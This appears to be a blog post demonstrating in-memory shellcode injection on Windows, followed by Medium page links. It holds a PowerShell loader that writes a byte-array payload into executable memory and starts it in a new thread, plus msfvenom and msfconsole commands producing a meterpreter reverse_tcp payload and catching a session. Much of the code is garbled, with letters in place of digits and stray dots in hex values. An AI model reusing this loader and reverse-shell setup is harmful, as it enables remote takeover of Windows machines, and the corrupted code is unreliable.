Simple In-Memory Injection

$pos= '[DllImport("kernel32.d11")] 
public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwpysize, uint flAllocationType, uint flProtect);[DllImport("kerne132.d11")]
public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackpysize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
public static extern IntPtr memset(IntPtr dest, uint src, uint count);';

$malFunc = Add-Type -memberDefinition $pos -Name 11Win32" -namespace Win32Functions -p assthru;
[Byte []];
[Byte[]] $pyld = 0xfc,0xe8,0x82,0x0,0x0,0x0,0x60,0x89,0xe5,0x31,0xc0,0x64,0x8b,0x50,0x30,0x8b,0x52,0xc,0x8b,0x52,0xl4,0x8b,0x72,0x28,0xf,0xb7,0x4a,0x.26,0x31,0xff,0xac,0x3c,0x61,0x7c,0x2,0x2c,0x20,0xcl,0xcf,0xd,0xl,0xc7,0xe2,0xf2,0x52,0x57,0x8b,0x52,0xl0,0x8b,0x4a,0x3c,0x8b,0x4c,0xll,0x78,0xe3,0x48,0xl,0xdl,0x51,0x8b,0x59,0x20,0xl,0xd3,0x8b,0x49,0xl8, 0xe3, 0x3a, 0x49, 0x8b, 0x34, 0x8b, 0xl, 0xd6, 0x31, 0xff, 0.xac, 0xcl,0xcf,0xd,0xl,0xc7,0x38,0xe0,0x75,0xf6,0x3,0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe4,0x58,0x8b,0x58,0x24,0xl,0xd3,0x66,0x8b,0xc,0x4b,0x8b,0x58,0xlc,0xl,0xd3,0x8b,0x4,0x8b,0xl,0xd0,0x89,0x44,0x24,0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x5f,0x5f,0x5a,0x8b,0xl2,0xeb,0x8d,0x5d,0x68,0x33 ,0x32 ,0x0 ,0x.0, 0x68, 0.x77, 0x73, 0x32 ,0x5f 0x7,0xff,0xd5,x90,0xl,0x0,0x0,0x29,0xc4,0x54,0x50,0x68,0x29,0x80,0x6b,0x0,0xff,0xd5,0x6a,0xa,0x68,0xac,0x10,0x74,0x8b,0x68,0x2,0x0,0xll,0x5c,0x89,0xe6,0x50,0x50,0x50,0x50,0x40,0x50,0x40,0x50,0x68,0xea,0xf,0xdf,0xe0,0xff,0xd5,0x97,0x6a,0xl0,0x56,0x57,0x68,0x99,0xa5,0x74,0x61,0xff,0xd5,0x85,0xc0,0x74,0xa,0xff,0x4e,0x8,0x75,0xec,0xe8,0x61,0x0,0x0,0x0,0x6a,0x06,0x6a,0x40,0x68,0x0,0x10,0x0,0x0,0x56,0x6a,0x0,0x68,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x93,0x53,0x6a,0x0,0x56,0x53,0x57,0x68,0x2,0xd9,0xc8,0x5f,0xff,0xd5,0x83,0xf8,0x0,0x7d,0x0x24,0xe9,0x71,0xff,0xff,0xff,0xl,0xc3,0x29,0xc6,0x75,0xc7,0xc3,0xbb,0xf0,0xb5,0xa2,0x56,0x6a,0x0,0x53,0xff,0xd5;
$pysize= 0x1000;
if ($pyld.Length -gt 0x1000) {$pysize = $pyld.Length};
$z = $malFunc::VirtualAlloc(0,$pysize,0x3000,0x40);
for ($i=0;$i -le ($pyld.Length-1);$i++) {$malFunc::memset([IntPtr]($z.Tolnt32()+$i), $pyld
[$i], 1)} ;
$malFunc::CreateThread(0,0,$z,0,0,0);for (;;) { Start-sleep 60 };
parrot@Userman:-$msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST= LPORT=4444 -f psh -o payld.ps1
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 410 bytes
Final size of psh file: 3255 bytes
Saved as: payld.ps1
parrot@Userman:-$msfconsole -x "use multi/handler;set payload windows/x64/meterpreter/reverse_tcp; set lhost; set lport 4444; set ExitOnSession false; exploit -j"
[*] Meterpreter session l opened ( -> 
meterpreter > whoami
  1. ,




Prakash Ashok, Security Analyst at WeSecureApp, CTF player, Blockchain developer and Security Researcher.

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

Setting up a Production Ready Java Web App in less than 10 minutes!

The Andela Boot camp Experience: Day 2

This week in DevOps #33 — GitOps Issue #15

AR(Instant Placement) — A TCW project Case Study — TheCodeWork

Top Advantages and Disadvantages Of Kubernetes

How to improve the DDDness of your application.

3 Reasons You Might Want To Switch To a NoSQL Database

What does a DevOps engineer do???Role of a DevOps Professional

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store


Prakash Ashok, Security Analyst at WeSecureApp, CTF player, Blockchain developer and Security Researcher.

More from Medium

Using Java Deserialization to exploit log4shell — LogForge, HTB

Apache Log4j Shell POC exploits

Why do Deserialization Vulnerabilities occur?

Proof of concept: zero-day- log4j RCE